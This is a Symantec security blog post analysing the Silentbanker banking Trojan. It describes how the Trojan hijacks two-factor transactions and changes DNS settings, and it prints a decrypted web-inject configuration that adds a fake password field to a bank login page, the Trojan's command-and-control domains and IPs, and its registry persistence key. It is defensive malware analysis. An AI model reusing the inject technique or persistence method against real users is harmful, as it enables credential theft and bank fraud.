Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Response

Banking in Silence

Created: 14 Jan 2008 08:00:00 GMT • Updated: 23 Jan 2014 18:43:03 GMT
Liam O Murchu's picture
0 0 Votes
Login to vote

Targeting over 400 banks (including my own:( ! ) and having the ability to circumvent two-factor authenticationare just two of the features that push Trojan.Silentbanker into thelimelight. The scale and sophistication of this emerging banking Trojanis worrying, even for someone who sees banking Trojans on a daily basis.

This Trojan downloads a configuration file that contains the domainnames of over 400 banks. Not only are the usual large American bankstargeted but banks in many other countries are also targeted, includingFrance, Spain, Ireland, the UK, Finland, Turkey—the list goes on.

The ability of this Trojan to perform man-in-the-middle attacks onvalid transactions is what is most worrying. The Trojan can intercepttransactions that require two-factor authentication. It can thensilently change the user-entered destination bank account details tothe attacker's account details instead. Of course the Trojan ensuresthat the user does not notice this change by presenting the user withthe details they expect to see, while all the time sending the bank theattacker's details instead. Since the user doesn’t notice anythingwrong with the transaction, they will enter the second authenticationpassword, in effect handing over their money to the attackers. TheTrojan intercepts all of this traffic before it is encrypted, so evenif the transaction takes place over SSL the attack is still valid.Unfortunately, we were unable to reproduce exactly such a transactionin the lab. However, through analysis of the Trojan's code it can beseen that this feature is available to the attackers.

The Trojan does not use this attack vector for all banks, however.It only uses this route when an easier route is not available. If atransaction can occur at the targeted bank using just a username andpassword then the Trojan will take that information, if a certificateis also required the Trojan can steal that too, if cookies are requiredthe Trojan will steal those. In fact, even if the attacker is missing apiece of information to conduct a transaction, extra HTML can be addedto the page to ask the user for that extra information. (In the examplebelow the user is asked to enter their encryption key, in addition tothe regular information.)

Here is the login form viewed on a clean machine:

Below the form presented to an infected user is shown, the input box added by the Trojan has been marked in red:

When instructed, the Trojan can also redirect users to anattacker-controlled server instead of the real bank in order to performa classic man-in-the-middle attack. Currently there is only one banktargeted in this way; however, recent updates to the Trojan change theuser's DNS settings to point to an attacker-controlled server. Usingthis technique the Trojan can start redirecting any site to an attackersite at any time. This feature could also mean that if the Trojan isremoved but the DNS settings are left unchanged then the user may stillbe at risk. (See below for the attackers' DNS server addresses.)

Add to all of the above the ability to steal FTP, POP, Web mail,protected storage, and cached passwords and then we start to see thecapabilities of this Trojan. But, it doesn’t stop there – don't forgetthe porn! The Trojan also contains over 600 pornographic Web site URLsthat can be shown to the infected user so that the attacker can makemoney from the referrals.

Lastly, the Trojan can also download updates, which it regularlydoes. It can also download other executables and it can use theinfected machine as a proxy or as a Web server on any chosen port (intests the http port used was 18102).

The multiple configuration files that the Trojan downloads areupdated several times per day and currently the Trojan is capable ofinjecting HTML into about 200 different URLs. The configuration filesare compressed and encrypted; however, after decrypting them we can seehow the Trojan works in more detail.

The configuration files are structured as .ini files and eachsection of an .ini file represents a different task. Here is a snippetfrom the configuration file that was used to inject HTML into thebanking form shown in the example above:

jhw21]
pok=insert
qas=someBankSite.com/xpage/loginxxxxxxxxxs.htm
njd=name="oppasswd;
dfr=14
xzn=/>n
xzq=2
rek=<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>’
req=166

The configuration options in the snippet above are as follows:

Token: Purpose:
pok Action to take
qas URL to take action on
njd String to search for
xzn End string to search for
rek HTML to insert

The Trojan searches for the string name="oppasswd; then it finds the end tag /> then it inserts the string into the page:

<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>

Shown below is the HTML shown to the user on a non-infected computer:

<label for="clave">Clave personal: </label>
<input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
</div>

And on an infected computer:

<label for="clave">Clave personal: </label>
<input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
<div class="clear sep4"></div>
<label for="clave">Clave de firma: </label>
<input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/>
</div>

The Trojan can take any of the following actions when altering theHTML of a page: insert, delete, replace, and replace all. The Trojanuses the keyword “ESpass” (see the form above) as a keyword when theuser sends a page to the bank and the Trojan checks if the pagecontains that keyword. Using this technique the Trojan can recognizepages it has altered and can extract the relevant data from the pageand send it to the attacker as well as to the bank.

The configuration files for this Trojan currently contain over 200kbof data; however, new URLs and HTML are being added to theconfiguration files on a daily basis. The Trojan is easily updatedsince the full HTML of any banking-related Web site is sent to theattackers. Using these submissions they can target banks for which theydo not have bank accounts already. We are currently monitoring all ofthe updates to this Trojan.

The Trojan accesses the following URLs for configuration, updates, and to send stolen data:

• iloveie.info
• webcounterstat.info
• microcbs.com
• reservaza.com
• screensaversfor-fun.com
• mystabcounter.info
• 85.255.119.218

The Trojan also downloads a copy of Trojan.Flush.J, which changes the users DNS settings to the following attacker settings:

• 85.255.116.133
• 85.255.112.87

For protection, please keep your antivirus definitions up to date and block the above addresses at the firewall.

Note: Not only did this Trojan grab my attentionfor obvious reasons, but the Trojan also installed itself as a .mididriver, causing my music to stop! For the record, the Trojan addsitself the following registry key so that it is loaded in allapplications that use sound:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\"midi1”